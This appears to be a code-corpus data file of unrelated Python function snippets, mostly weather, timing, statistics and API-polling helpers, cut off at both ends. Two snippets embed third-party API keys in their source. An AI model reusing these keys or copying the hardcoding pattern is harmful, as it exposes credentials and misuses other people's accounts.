[\"firefox_cgroup\", \"emacs_cgroup\",\n \"zsh_cgroup\", \"mongo_cgroup\"],\n \"usage\": {\n \"firefox_cgroup\": 8.35,\n \"emacs_cgroup\": 5.52,\n \"zsh_cgroup\": 0.01,\n \"mongo_cgroup\": 0.64,\n },\n \"global_cpu_usage\": 27.59000000000001,\n },\n ]", "def make_request(coins, time_frame_in_min):\n while True:\n for i in coins:\n a = r.get('https://bittrex.com/api/v1.1/public/getmarketsummary?market=btc-{}'.format(i)).text\n with open('price_data/' + str(i) + '.json', 'a') as f:\n f.write('{}\\n'.format(a))\n\n time.sleep(60 * time_frame_in_min)", "def tobs():\n # Create our session (link) from Python to the DB.\n session = Session(engine)\n\n # Calculate the date 1 year ago from the last data point in the database.\n last_measurement_data_point_tuple = session.query(Measurement.date).order_by(Measurement.date.desc()).first()\n (latest_date, ) = last_measurement_data_point_tuple\n latest_date = dt.datetime.strptime(latest_date, '%Y-%m-%d')\n latest_date = latest_date.date()\n date_year_ago = latest_date - relativedelta(years=1)\n\n # Perform a query to retrieve the data and temperature scores.\n data_from_last_year = session.query(Measurement.date, Measurement.tobs).filter(Measurement.date >= date_year_ago).all()\n\n session.close()\n\n # Convert results to a dictionary \n all_temperatures = []\n for date, temp in data_from_last_year:\n if temp != None:\n temp_dict = {}\n temp_dict[date] = temp\n all_temperatures.append(temp_dict)\n # Return JSON\n return jsonify(all_temperatures)", "def getTimes():", "def getTimes():", "def getTimes():", "def update_stats(self, responses, no_responses):\n slowest_rtt = 0.0\n slowest_ip = None\n fastest_rtt = 9999999.9\n fastest_ip = None\n rtt_total = 0.0\n\n for ip, rtt in responses.items():\n rtt_total += rtt\n if rtt > slowest_rtt:\n slowest_rtt = rtt\n slowest_ip = ip\n elif rtt < fastest_rtt:\n fastest_rtt = rtt\n fastest_ip = ip\n\n sorted_rtts = sorted(responses.values())\n l = len(sorted_rtts)\n if l == 0:\n median_rtt = 0.0\n elif l % 2 == 1:\n # Odd number: Median is the middle element\n median_rtt = sorted_rtts[int(l / 2)]\n else:\n # Even number (average between two middle elements)\n median_rtt = (sorted_rtts[int(l / 2) - 1] +\n sorted_rtts[int(l / 2)]) / 2.0\n\n now = datetime.datetime.now().isoformat()\n m = {\n \"time\" : now,\n \"num_responses\" : len(responses),\n \"num_no_responses\" : len(no_responses),\n \"slowest\" : {\n \"ip\" : slowest_ip,\n \"rtt\" : slowest_rtt\n },\n \"fastest\" : {\n \"ip\" : fastest_ip,\n \"rtt\" : fastest_rtt\n },\n \"average_rtt\" : rtt_total / len(responses),\n \"median_rtt\" : median_rtt\n }\n\n self.measurements.insert(0, m)\n self.measurements = self.measurements[:self.max_num_measurements]", "def range():\n\n # Time this functions.\n timer = coils.Timer()\n\n # Parse the URL parameter \"amount\".\n errors = list()\n try:\n amount = flask.request.args.get('amount')\n amount = float(amount)\n except:\n errors.append('Failed to parse \"amount\" parameter.')\n\n # Bail on any errors.\n if errors:\n return flask.jsonify(errors=errors)\n\n\n latest_tstring = db.session.query(mapping.Datum).\\\n filter(mapping.Datum.name=='latest_tstamp')[0].value\n latest_time = coils.string2time(latest_tstring)\n start_time = latest_time - dt.timedelta(seconds=amount)\n start_tstring = getNearestTime(start_time)\n \n return flask.jsonify(\n begin_time=start_tstring,\n end_time=latest_tstring,\n )", "def tip_calulator(total, people, tip):\n tip = tip / 100\n total = total / people\n tip_amount = total * tip\n new_total = total + tip_amount\n\n return tip_amount, new_total\n # pass", "def send_data():\n range = request.args.get('range', '30')\n time = arrow.utcnow().replace(minutes=-int(range))\n data = Temperature.query\\\n .filter(Temperature.timestamp > time).order_by(Temperature.timestamp.desc()).all()\n return jsonify(results=[i.serialize for i in data])", "def func1():\r\n f = urllib.request.urlopen('http://api.wunderground.com/api/94127df53e899ea4/history_20000531/q/autoip.json')\r\n tob='11:00pm'\r\n \r\n # Automatically geolocate the connecting IP\r\n ff = urllib.request.urlopen('http://freegeoip.net/json/')\r\n json_string = ff.read()\r\n ff.close()\r\n location = json.loads(json_string)\r\n \r\n city =location['city']\r\n state = location['region_name']\r\n country = location['country_name']\r\n zip = location['zip_code']\r\n \r\n print(\"Your nearest Location:\")\r\n print(\"1. country: %s ,state: %s\"%(country,state))\r\n print(\"2. city: %s ,zip-code: %s\"%(city,zip))\r\n print()\r\n json_string = f.read()\r\n parsed_json = json.loads(json_string)\r\n \r\n \r\n dailySummary=parsed_json['history']['dailysummary'][0]\r\n fog=dailySummary['fog']\r\n rain=dailySummary['rain']\r\n snow=dailySummary['snow']\r\n \r\n humidity=dailySummary['humidity']\r\n maxTemp=dailySummary['maxtempm']\r\n minTemp=dailySummary['mintempm']\r\n \r\n pressure=dailySummary['meanpressurem']\r\n \r\n print(\"my birth of year is 1991, but the data is unavailable. So, 2000AD was selected\")\r\n print(\"The weather data is available from 1997 in this location!!!\")\r\n print(\"#Weather data on 31 May 2000 at the location:\")\r\n print(\"------------------------------\")\r\n print()\r\n print(\"1. fog: %s ,rain: %s ,snow: %s\"%(fog,rain,snow))\r\n print(\"2. humidity: %s ,pressure: %s\"%(humidity,pressure))\r\n \r\n print(\"3. max-temperature: %s\\u00b0C ,min-temperature: %s\\u00b0C \"%(maxTemp,minTemp))\r\n \r\n \r\n obs= parsed_json['history']['observations'][38]\r\n \r\n \r\n fog=obs['fog']\r\n rain=obs['rain']\r\n snow=obs['snow']\r\n \r\n humidity=obs['hum']\r\n Temp=obs['tempm']\r\n \r\n \r\n pressure=obs['pressurem']\r\n \r\n print()\r\n print(\"I was born roughly at 11 pm\")\r\n print(\"#Weather data at that time on 31 May 2000 at the location:\")\r\n print(\"------------------------------\")\r\n print()\r\n print(\"1. fog: %s ,rain: %s ,snow: %s\"%(fog,rain,snow))\r\n print(\"2. humidity: %s ,pressure: %s\"%(humidity,pressure))\r\n \r\n print(\"3. temperature: %s\\u00b0C\"%(Temp))\r\n \r\n f.close()", "def toy_transformer(in_file, out_file):\n new_data = {}\n new_data['experiment'] = \"toy\"\n with open(in_file, \"r\") as fh:\n fancyprint(in_str=(\"Importing: \" + in_file))\n source = json.load(fh)\n fancyprint(in_str=\"Converting into toy format\")\n new_data[\"version\"] = source[\"version\"]\n new_data[\"data\"] = []\n topic_counter = 3\n for topic in tqdm(source[\"data\"]):\n topic_dict = {}\n topic_dict[\"title\"] = topic[\"title\"]\n topic_dict[\"paragraphs\"] = []\n para_counter = 3\n for para in topic[\"paragraphs\"]:\n paragraph = {}\n paragraph[\"context\"] = para[\"context\"]\n paragraph[\"qas\"] = []\n qa_counter = 3\n for qas in para['qas']:\n qas_dict = {}\n qas_dict[\"id\"] = qas[\"id\"]\n qas_dict[\"is_impossible\"] = qas[\"is_impossible\"]\n qas_dict[\"question\"] = quick_clean(raw_str=qas[\"question\"])\n qas_dict[\"answers\"] = []\n if not qas[\"is_impossible\"]:\n for answer in qas[\"answers\"]:\n answer_dict = {}\n answer_dict[\"answer_start\"] = answer[\"answer_start\"]\n answer_dict[\"text\"] = answer[\"text\"]\n qas_dict[\"answers\"].append(answer_dict)\n paragraph[\"qas\"].append(qas_dict)\n\n qa_counter -= 1\n if qa_counter == 0:\n break\n\n topic_dict[\"paragraphs\"].append(paragraph)\n para_counter -= 1\n if para_counter == 0:\n break\n\n new_data[\"data\"].append(topic_dict)\n\n topic_counter -= 1\n if topic_counter == 0:\n break\n\n save(filename=out_file, obj=new_data, message=\"saving toy data\")", "def get_exercise(username, month, year):\n\n def _format_output(_workouts):\n _workouts = [w.to_dict() for w in _workouts]\n _workouts.sort(key=lambda w: w['start_time'])\n output = []\n\n if len(_workouts) > 0:\n first_workout = _workouts[0]\n prev_exercise = first_workout['exercise']\n prev_exercise_start = first_workout['start_time']\n prev_set_end = first_workout['end_time']\n if first_workout['skeleton_data']:\n picture = encodestring(first_workout['skeleton_data'])\n else:\n picture = None\n\n exercise = {\n 'exercise': prev_exercise,\n 'reps': [first_workout['repetitions']],\n 'weights': [first_workout['weight']],\n 'startTimes': [first_workout['start_time']],\n 'endTimes': [first_workout['end_time']],\n 'picture': picture\n }\n\n for ii in range(1, len(_workouts)):\n current_workout = _workouts[ii]\n current_set_start = current_workout['start_time']\n if current_workout['exercise'] == prev_exercise and current_set_start - prev_set_end < REST_INTERVAL:\n exercise['reps'].append(current_workout['repetitions'])\n exercise['weights'].append(current_workout['weight'])\n exercise['startTimes'].append(current_set_start)\n exercise['endTimes'].append(current_workout['end_time'])\n else:\n output.append({\n 'date': prev_exercise_start,\n 'exercises': exercise\n })\n prev_exercise_start = current_workout['start_time']\n if current_workout['skeleton_data']:\n picture = encodestring(current_workout['skeleton_data'])\n else:\n picture = None\n\n exercise = {\n 'exercise': current_workout['exercise'],\n 'reps': [current_workout['repetitions']],\n 'weights': [current_workout['weight']],\n 'startTimes': [current_set_start],\n 'endTimes': [current_workout['end_time']],\n 'picture': picture\n }\n\n prev_exercise = current_workout['exercise']\n prev_set_end = current_workout['end_time']\n\n output.append({\n 'date': prev_exercise_start,\n 'exercises': exercise\n })\n\n return output\n\n if month < MIN_MONTH or month > MAX_MONTH or year < MIN_YEAR:\n raise ValueError('Invalid date passed into workout query')\n\n user_id = _get_user_id(username)\n if user_id is None:\n return None\n\n epoch = datetime(month=1, year=1970, day=1)\n month_start_epoch = int((datetime(month=month, year=year, day=1) - epoch).total_seconds())\n if month == 12:\n month_end_epoch = int((datetime(month=1, year=year + 1, day=1) - epoch).total_seconds())\n else:\n month_end_epoch = int((datetime(month=month + 1, year=year, day=1) - epoch).total_seconds())\n\n exercises = select(exercise for exercise in UserExerciseData\n if (exercise.user_id == user_id\n and exercise.start_time > month_start_epoch\n and exercise.start_time < month_end_epoch)\n )[:]\n\n exercises = _format_output(exercises)\n\n # Ensure that query obtained results\n if len(exercises) > 0:\n result = {'username': username, 'data': exercises}\n else:\n result = None\n return result", "def zeetemps(start_date):\n print(\"server received request for tobs stats start to end of data...\")\n # correct for dates before the start of our data\n if start_date < '2010-01-01':\n start_date = '2010-01-01'\n # set end date\n end_date = '2017-08-23'\n range_df = temps_df[(temps_df['date'] >= start_date) & (temps_df['date'] <= end_date)]\n lowest = range_df['tobs'].min()\n highest = range_df['tobs'].max()\n average = range_df['tobs'].mean()\n output = {'TMIN': lowest, 'TMAX': highest, 'TAVG': average}\n return jsonify(output)", "def temps(): \n \n # Create session and save reference to table\n session = Session(engine)\n Measurement = Base.classes.measurement\n\n # Query\n tobs_query = session.query(Measurement.date, func.avg(Measurement.tobs).label('tobs'))\\\n .filter(Measurement.date >= '2016-08-23').group_by(Measurement.date)\n \n tobs_list = []\n for row in tobs_query:\n tobs_list.append(row._asdict())\n \n return jsonify(tobs_list)\n\n session.close()", "def calc_times():\n app.logger.debug(\"Got a JSON calc_time post\");\n global dateFormat\n reply = {}\n bLength = int(request.form[\"bLength\"])\n\n try:\n start = arrow.get(flask.session[\"bStart\"], \"YYYY/MM/DD HH:mm\")\n except:\n reply[\"message\"] = \"Bad date Time.\"\n return jsonify(result=reply)\n\n brevet = AcpBrevet(bLength, start)\n open_limit = brevet.calc_open(int(request.form[\"dist\"]),bLength)\n close_limit = brevet.calc_close(int(request.form[\"dist\"]),bLength)\n\n reply[\"message\"] = \"Controle added or updated.\"\n reply[\"open\"] = open_limit.format(dateFormat)\n reply[\"close\"] = close_limit.format(dateFormat)\n\n return jsonify(result=reply)", "def write_stacked_response_times(self):\r\n results_dirname = get_param(\"results_dir\")\r\n filename = os.path.join(results_dirname, \"%s_%s\" % (get_param(\"file_prefix\"),\r\n \"stacked_fairness\"))\r\n file = open(filename, \"w\")\r\n file.write(\"time\\trunning_tasks\\n\")\r\n previous_time = -1\r\n # Write in reverse order so that we automatically get the last event\r\n # for each time.\r\n for time, running_tasks in reversed(self.new_running_tasks):\r\n if time != previous_time:\r\n if previous_time != -1:\r\n file.write(\"%d\\t\" % time)\r\n for user in range(get_param(\"num_users\")):\r\n file.write(\"%d\\t\" % running_tasks[user])\r\n file.write(\"\\n\")\r\n previous_time = time", "def slow_update_duration(self):\n for i in range(len(self.data_file.sorted_data)):\n if self.data_file.sorted_data[i]['type'] == 'slow':\n slow_upd = self.data_file.sorted_data[i]['timestamp']\n Config.ANALYSIS.write(f\"slow at: {slow_upd}\\n\")\n if i == 0:\n after_slow = self.data_file.sorted_data[i + 1]['timestamp']\n Config.ANALYSIS.write(f\"after slow: ({slow_upd}, {after_slow}) \"\n f\"= {after_slow - slow_upd}\\n\\n\")\n elif i == len(self.data_file.sorted_data) - 1:\n before_slow = self.data_file.sorted_data[i - 1]['timestamp']\n Config.ANALYSIS.write(f\"before slow: ({before_slow}, {slow_upd}) \"\n f\"= {slow_upd - before_slow}\\n\\n\")\n else:\n before_slow = self.data_file.sorted_data[i - 1]['timestamp']\n after_slow = self.data_file.sorted_data[i + 1]['timestamp']\n Config.ANALYSIS.write(f\"before slow: ({before_slow}, {slow_upd}) \"\n f\"= {slow_upd - before_slow}\\n\")\n Config.ANALYSIS.write(f\"after slow: ({slow_upd}, {after_slow}) \"\n f\"= {after_slow - slow_upd}\\n\\n\")\n Config.ANALYSIS.write(\"\\n\\n\")", "def _calc_times():\n app.logger.debug(\"Got a JSON request\")\n distance = request.args.get(\"distance\", type = int)\n begin_time = request.args.get(\"begin_time\", type = str)\n begin_date = request.args.get(\"begin_date\", type = str)\n brevet_start_time = begin_date + \" \" + begin_time\n km = request.args.get('km', 999, type=float)\n\n app.logger.debug(\"km={}\".format(km))\n app.logger.debug(\"request.args: {}\".format(request.args))\n # FIXME: These probably aren't the right open and close times\n # and brevets may be longer than 200km\n open_time = acp_times.open_time(km, distance, brevet_start_time)\n close_time = acp_times.close_time(km, distance, brevet_start_time)\n result = {\"open\": open_time, \"close\": close_time}\n return flask.jsonify(result=result)", "def temp():\n \n #Query temp from a year from last data point\n query = session.query(func.max(Measurement.date)).first()\n maxDate = dt.datetime.strptime(query[0],'%Y-%m-%d')\n year_ago = maxDate - dt.timedelta(days=365)\n\n results = session.query(Measurement.date,Measurement.tobs).filter(Measurement.date>=year_ago).all()\n\n # convert list of tuples into normal list\n all_dates = (result[0] for result in results)\n all_tobs = (result[1] for result in results)\n\n # Convert result to dictionary using date as key and tobs as value\n tobs_dict = dict(zip(all_dates,all_tobs))\n\n # Return on webpage\n return jsonify(tobs_dict)", "def output_stats(self):\n elapsed = self.timer.elapsed.total_seconds()\n count = self.copied + self.errored\n total = self.total\n # Time per key in milliseconds\n avg = round(elapsed / count * 1000, 3)\n # Time remaining in seconds\n remaining = 1.0 * elapsed / count * (total - count)\n # Time remaining in minutes\n remaining = round(remaining / 60.0, 1)\n # Time taken in minutes\n elapsed = round(elapsed / 60.0, 1)\n\n self.log.info(f\"{self.prefix}: {avg}ms avg, {elapsed}min passed, \"\n f\"{remaining}min remaining. ({count:,}/{total:,})\")", "def overall(update: Update, context: CallbackContext) -> None:\n\n today, _ = get_latest_stats_from_db()\n seven_day, rolling_avg = return_weekly_figure()\n \n logger.info(\"Getting overall stats for \" + str(update.message.chat_id))\n \n text = \\\n (\n \"📊*Overall stats as of \" + today['date'] + \"*\\n\\n\"\n + \"\\t\\t\\t🔢 Overall Total - \" + str('{:,}'.format(today['totalVaccinations']))\n + \"\\n\\n\\t\\t\\t🅿️ Pfizer : \" + str('{:,}'.format(today['pfizer']))\n + \"\\n\\t\\t\\t🅰️ AstraZeneca : \" + str('{:,}'.format(today['astraZeneca']))\n + \"\\n\\t\\t\\tⓂ️ Moderna : \" + str('{:,}'.format(today['moderna']))\n + \"\\n\\t\\t\\t🇯 J&J - \" + str('{:,}'.format(today['jj'])) + \"\\n\\n\"\n + \"*🧑 Total population vaccinated*\\n\\n\"\n + \"\\t\\t\\t🌓 First dose (of a two dose vaccine) - \" + str('{0:.2%}'.format(today['firstDose']/4977400)) + \"\\n\"\n + \"\\t\\t\\t🌓 Single dose vaccine - \" + str('{0:.2%}'.format(today['jj']/4977400)) + \"\\n\"\n + \"\\t\\t\\t🌝 Fully vaccinated - \" + str('{0:.2%}'.format(today['secondDose']/4977400)) + \"\\n\"\n +\"\\n\\n*🧑 12+ population vaccinated*\\n\"\n +\"\\n\\t\\t\\t🌓 First dose (of a two dose vaccine) - \" + str('{0:.2%}'.format(today['firstDose']/4183700))\n +\"\\n\\t\\t\\t🌓 Single dose vaccine - \" + str('{0:.2%}'.format(today['jj']/4183700))\n +\"\\n\\t\\t\\t🌝 Fully vaccinated - \" + str('{0:.2%}'.format(today['secondDose']/4183700)) + \"\\n\"\n + \"\\n📅 *Rolling 7 Day Stats*\\n\" \n + \"\\n\\t\\t\\t📈 Rolling 7 Day Doses - \" + str('{:,}'.format(seven_day))\n + \"\\n\\t\\t\\t💉 Average Daily Doses - \" + str('{:,}'.format(rolling_avg))\n + \"\\n\\n👇* Commands *\"\n + \"\\n\\n\\t\\t\\t/daily - Subscribe for daily updates\"\n + \"\\n\\n\\t\\t\\t/unsubscribe - Unsubscribe from updates\"\n + \"\\n\\n\\t\\t\\t/start - See all commands\"\n )\n\n update.message.reply_markdown(text)", "def tobs():\n \n #get max and year_past date from DB\n max_dt, yr_past = get_year_past()\n \n session = Session(engine)\n # Query all Measurement Table to get precipitation date for all available dates\n results = session.query(M.date.label('Date'), coalesce(M.tobs.label(\"TempObs\"),0)).\\\n filter(M.date >= yr_past).order_by(M.date).all()\n \n # Convert list of tuples into dict with date as the key and precipitation as value\n temp_dict = [{d:p} for d,p in results]\n \n session.close()\n return jsonify(temp_dict)", "def print_json(results, number, concurrency):\n import json\n stats = calc_stats(results, number, concurrency)\n print(json.dumps(stats))", "def json_frapp(request):\n from pv.settings import MEDIA_URL\n\n if request.GET.get('date') == None:\n start = datetime.combine(date.today(), time(0, 0))\n else:\n start = datetime.combine( datetime.strptime(request.GET.get('date'), '%Y-%m-%d').date(), time(0, 0))\n\n end = datetime.combine(start, time(23, 59))\n\n timeslots = TimeSlot.objects.filter(start__gte=start,start__lte=end).select_related('show').order_by('start')\n\n\n '''Generate categories object for output'''\n\n categories = Category.objects.all()\n categories_output = []\n\n for c in categories:\n c_entry = {\n 'id': c.id,\n 'color': c.color.replace('#', '').upper(),\n 'namedisplay': c.category,\n 'description': c.description\n }\n\n categories_output.append(c_entry)\n\n # Get all series for timeslots\n series = set()\n for ts in timeslots:\n series.add(ts.show)\n\n\n '''Generate series object for output'''\n\n series_output = []\n\n for s in series:\n metainfos = []\n metainfos.append({ 'key': 'ProduzentIn', 'value': ', '.join(ts.show.hosts.values_list('name', flat=True)) })\n metainfos.append({ 'key': 'E-Mail', 'value': ', '.join(ts.show.hosts.values_list('email', flat=True)) })\n\n image = '' if s.image.name == None or s.image.name == '' else str(get_current_site(request)) + MEDIA_URL + s.image.name\n url = '' if s.website == None or s.website == '' else s.website\n\n # Get active schedules for the given date\n # But include upcoming single timeslots (with rrule_id=1)\n schedules = Schedule.objects.filter( Q(show=s.id,is_repetition=False) &\n (\n Q(rrule_id__gt=1,dstart__lte=start,until__gte=start) |\n Q(rrule_id=1,dstart__gte=start)\n )\n )\n\n schedules_repetition = Schedule.objects.filter( Q(show=s.id,is_repetition=True) &\n (\n Q(rrule_id__gt=1,dstart__lte=start,until__gte=start) |\n Q(rrule_id=1,dstart__gte=start)\n )\n )\n\n broadcastinfos = ''\n\n if not schedules.exists():\n continue\n\n for schedule in schedules:\n broadcastinfos = broadcastinfos + generate_frapp_broadcastinfos(schedule)\n\n if schedules_repetition.exists():\n broadcastinfos = broadcastinfos + 'Wiederholung jeweils:'\n for schedule in schedules_repetition:\n broadcastinfos = broadcastinfos + generate_frapp_broadcastinfos(schedule)\n\n s_entry = {\n 'id': s.id,\n 'categoryid': s.category.values_list('id', flat=True)[0],\n 'color': s.category.values_list('color', flat=True)[0].replace('#', '').upper(),\n 'namedisplay': s.name,\n 'description': s.description,\n 'url': url,\n 'image': image,\n 'broadcastinfos': broadcastinfos,\n 'metainfos': metainfos\n }\n\n series_output.append(s_entry)\n\n\n '''Generate shows object for output'''\n\n shows_output = []\n\n for ts in timeslots:\n\n is_repetition = ' ' + _('REP') if ts.schedule.is_repetition is 1 else ''\n namedisplay = ts.show.name + is_repetition\n description = ts.show.description\n url = str(get_current_site(request)) + '/shows/' + ts.show.slug\n urlmp3 = ''\n\n # If there's a note to the timeslot use its title, description and url\n try:\n note = Note.objects.get(timeslot=ts.id)\n namedisplay = note.title + is_repetition\n description = note.content\n url = str(get_current_site(request)) + '/notes/' + note.slug\n urlmp3 = note.audio_url\n except ObjectDoesNotExist:\n pass\n\n ts_entry = {\n 'id': ts.id,\n 'seriesid': ts.show.id,\n 'datetimestart': ts.start.strftime('%d.%m.%Y %H:%M:%S'),\n 'datetimeend': ts.end.strftime('%d.%m.%Y %H:%M:%S'),\n 'namedisplay': namedisplay,\n 'description': description,\n 'url': url,\n 'urlmp3': urlmp3,\n }\n\n shows_output.append(ts_entry)\n\n output = {}\n output['categories'] = categories_output\n output['series'] = series_output\n output['shows'] = shows_output\n\n return HttpResponse(json.dumps(output, ensure_ascii=False).encode('utf8'),\n content_type=\"application/json; charset=utf-8\")", "def print_results():\n now_time = time.time()\n diff_time_in_sec = now_time - start_time\n generated_per_second = total / diff_time_in_sec\n generated_per_hour = 3600 * generated_per_second\n saved_per_second = success / diff_time_in_sec\n saved_per_hour = 3600 * saved_per_second\n\n os.system('cls' if os.name == 'nt' else 'clear')\n print(f\"{'Generated:' : <16}{total : <12}\")\n print(f\"{'New graphs:' : <16}{success : <12}\")\n print(f\"{'Success rate:' : <16}{round((success / total) * 100, 3) : <7} %\")\n print(f\"{'Speed:' : <16}{round(generated_per_hour) : <7} graphs/h\")\n print(f\"{'Save speed:' : <16}{round(saved_per_hour) : <7} graphs/h\")", "def all_heart_data(start_date: str = None, days_limit: int = None):\n temp_json_target = os.path.join(temp_json_target_root, str(uuid4()))\n fitbit_access.save_heart_data(temp_json_target, start_date, days_limit)\n resting_hr, activity = process_heart_json_files(temp_json_target)\n\n return {\n \"resting_heart_rate\": resting_hr,\n \"heart_activity\": activity\n }", "def process_weather(forecast_file):\n with open(forecast_file) as json_file:\n json_data = json.load(json_file)\n\n min_temp_store = {}\n max_temp_store = {}\n weather_results = str()\n header_results = str()\n\n for day_in_forecast in json_data['DailyForecasts']:\n day_date = day_in_forecast['Date']\n min_temp = day_in_forecast['Temperature']['Minimum'][\"Value\"]\n min_temp_c = convert_f_to_c(min_temp)\n min_temp_store[day_date] = min_temp_c\n max_temp = day_in_forecast['Temperature']['Maximum'][\"Value\"]\n max_temp_c = convert_f_to_c(max_temp)\n max_temp_store[day_date] = max_temp_c\n\n day_time_phrase = day_in_forecast['Day']['LongPhrase']\n rain_chance_day = day_in_forecast['Day']['RainProbability']\n night_time_phrase = day_in_forecast['Night']['LongPhrase']\n rain_chance_night = day_in_forecast['Night']['RainProbability']\n weather_results = weather_results + (f\"-------- {convert_date(day_date)} --------\\nMinimum Temperature: {format_temperature(round(min_temp_c,1))}\\nMaximum Temperature: {format_temperature(round(max_temp_c,1))}\\nDaytime: {day_time_phrase}\\n Chance of rain: {rain_chance_day}%\\nNighttime: {night_time_phrase}\\n Chance of rain: {rain_chance_night}%\\n\")+ \"\\n\"\n\n\n max_day = max(max_temp_store, key=max_temp_store.get)\n max_value = max_temp_store[max_day]\n min_day = min(min_temp_store, key=min_temp_store.get)\n min_value = min_temp_store[min_day]\n max_totals = (sum(max_temp_store.values()))\n min_totals = (sum(min_temp_store.values()))\n num_items = len(min_temp_store)\n mean_min = round(calculate_mean(min_totals,num_items),1)\n mean_max = round(calculate_mean(max_totals,num_items),1)\n\n save_header = (f\"{len(json_data['DailyForecasts'])} Day Overview\\n The lowest temperature will be {format_temperature(round((min_value),1))}, and will occur on {convert_date(min_day)}.\\n The highest temperature will be {format_temperature(round((max_value),1))}, and will occur on {convert_date(max_day)}.\\n The average low this week is {format_temperature(mean_min)}.\\n The average high this week is {format_temperature(mean_max)}.\\n\")\n\n header_results = save_header + \"\\n\"+ weather_results\n \n return(header_results)", "def WriteReachedData(filename, page_to_reached_data):\n json_object = []\n for (offset, data) in page_to_reached_data.items():\n json_object.append({'offset': offset, 'total': data['total'],\n 'reached': data['reached']})\n with open(filename, 'w') as f:\n json.dump(json_object, f)", "def tobs():\n # calculate year ago from latest date in database\n latest_date = session.query(Measurement.date).order_by(Measurement.date.desc()).first()\n year_ago = dt.datetime.strptime(latest_date[0], \"%Y-%m-%d\") - dt.timedelta(days=366)\n\n # retrieve temp observations and convert to list\n temps = list(session.query(Measurement.date, Measurement.tobs).filter(Measurement.date >= year_ago).all())\n return jsonify(temps)", "def test():\n #Our API key\n api_key = \"5c5a1a440d3b0e89239368a9a8fb251b\"\n #latitude - The latitude of the location for the forecast\n lat = 13.7522222\n #longitude - The longitude of the location for the forecast\n lng = 100.4938889\n #datetime.datetime(year, month, day[, hour[, minute[, second[, microsecond[, tzinfo]]]]])\n year = 2015\n month = 11\n day = 8\n hour = 1\n minute = 22\n second = 33\n current_time = datetime.datetime.now()\n time = current_time\n #specific date\n #time = datetime.datetime(year, month, day, hour, minute, second, 44, pytz.UTC)\n forecast = forecastio.load_forecast(api_key, lat, lng, time=time)\n day = time.day\n the_dict = dict()\n the_list = list()\n #number of the day needs\n for i in range(2):\n forecast2 = forecastio.load_forecast(api_key, lat, lng, time=time)\n by_hour2 = forecast2.hourly()\n print(\"DAY:\",day,time.strftime(\"%B\"), file=myfile)\n for hourly_data_point in by_hour2.data:\n the_weather = \"\"+str(hourly_data_point)[30:].split(' at')[0].strip()\n the_list.append(the_weather)\n d = dict()\n for c in the_list:\n if c not in d:\n d[c] = 1\n else:\n d[c] = d[c] + 1\n sorted_d = sorted(d.items(), key=operator.itemgetter(0))\n sorted_d.reverse()\n print (sorted_d, file=myfile)\n #myfile.write(sorted_d)\n forecast2 = forecastio.load_forecast(api_key, lat, lng, time=datetime.datetime(2015, 11, day, 1, 22, 33, 44, pytz.UTC))\n print(forecast2.hourly().summary, file=myfile)\n #myfile.write(forecast2.hourly().summary)\n time += datetime.timedelta(days=1)\n day = time.day\n the_list = list()\n myfile.close()\n #Reset day for next method\n day = time.day\n print(\"===========Currently Data=========\")\n print(forecast.currently())\n #print(\"===========Hourly Data=========\")\n by_hour = forecast.hourly()\n #print(\"Hourly Summary: %s\" % (by_hour.summary))\n #print(\"bhs\",by_hour.summary)\n for hourly_data_point in by_hour.data:\n break\n #print(hourly_data_point)\n #print(str(hourly_data_point)[30:].split(' at')[0])\n #print(\"===========Daily Data=========\")\n by_day = forecast.daily()\n #API no longer support this point\n #print(\"Daily Summary: %s\" % (by_day.summary))\n for daily_data_point in by_day.data:\n break\n print(daily_data_point)", "def do_tradehist24(self,args):\n try:\n print \"Starting to download entire trade history from bitstamp....\",\n eth = bitstamp.get_transactions(86400)\n with open(os.path.join(partialpath + 'bitstamp_entiretrades.txt'),'w') as f:\n depthvintage = str(time.time())\n f.write(depthvintage)\n f.write('\\n')\n json.dump(eth,f)\n f.close()\n print \"Finished.\"\n except Exception as e:\n print \"Unexpected Error: %s\" % e\n self.onecmd('help tradehist24')", "def _calc_times():\n app.logger.debug(\"Got a JSON request\")\n km = request.args.get('km', 999, type=float)\n distance = request.args.get('distance', type = int)\n begin_date = request.args.get('begin_date', type = str)\n begin_time = request.args.get('begin_time', type = str)\n dateAndTime = begin_date + \" \" + begin_time\n time = arrow.get(dateAndTime, 'YYYY-MM-DD HH:mm') \n \n open_time = acp_times.open_time(km, distance, time.isoformat())\n close_time = acp_times.close_time(km, distance, time.isoformat())\n result = {\"open\": open_time, \"close\": close_time}\n return flask.jsonify(result=result)", "def update_autobidder_logs(self):\n # also update user config vars\n self.getUserConfig()\n\n try:\n num_coins = self.driver.find_element(\n By.XPATH, '/html/body/main/section/section/div[1]/div[1]/div[1]').text\n num_coins = str(num_coins)\n if \",\" in num_coins:\n num_coins = num_coins.replace(\",\", \"\")\n\n num_coins = int(num_coins)\n self.user_num_coins = num_coins\n with open('./data/gui_stats.json', 'r') as f:\n json_data = json.load(f)\n # json_data2 = json_data[0]\n json_data[0][\"# of Targets\"] = self.user_num_target_players\n json_data[0]['# of Bids to make on each'] = self.user_num_bids_each_target\n json_data[0]['Requests made'] = self.user_requests_made\n json_data[0]['Bids made'] = self.user_bids_made\n json_data[0]['Transfer list size'] = self.user_transferlist_size\n json_data[0]['Active bids'] = self.user_activebids\n json_data[0]['Current coins'] = self.user_num_coins\n json_data[0]['Players won'] = self.user_players_won\n json_data[0]['Projected Profit'] = self.user_projected_profit\n json_data[0]['Actual profit'] = \"--\"\n\n json_data[0]['watchlist_winning'] = self.user_watchlist_winning\n json_data[0]['watchlist_outbid'] = self.user_watchlist_outbid\n json_data[0]['watchlist_totalsize'] = self.user_watchlist_totalsize\n json_data[0]['transferlist_selling'] = self.user_transferlist_selling\n json_data[0]['transferlist_sold'] = self.user_transferlist_sold\n json_data[0]['transferlist_totalsize'] = self.user_transferlist_totalsize\n json_data[0]['Starting coins'] = self.user_start_coins\n\n with open('./data/gui_stats.json', 'w') as f:\n f.write(json.dumps(json_data))\n except:\n print(\"Err update_autobidder_logs\")", "def getMaxTipPercentage(trip_year, trip_quarter):\n paramlist = []\n status = 0\n try:\n # Dynamically add parameter for SP call\n if trip_year is not None:\n paramlist.append(validateNumericInput(trip_year))\n if trip_quarter is not None:\n paramlist.append(validateNumericInput(trip_quarter))\n procname = 'sp_YelloTaxiTipInsight'\n # Return column list\n columnlist = ['trip_year', 'trip_quarter', 'max_tip_pctg']\n # Read data from DB as per requested criteria\n dftippercentage, success = readusingsqldbproc(procname, paramlist, columnlist)\n ret_json_str = ''\n if len(dftippercentage.head(1)) > 0 and len(paramlist) > 0:\n # Rounding off to next digit\n dftippercentage['max_tip_pctg'] = \\\n 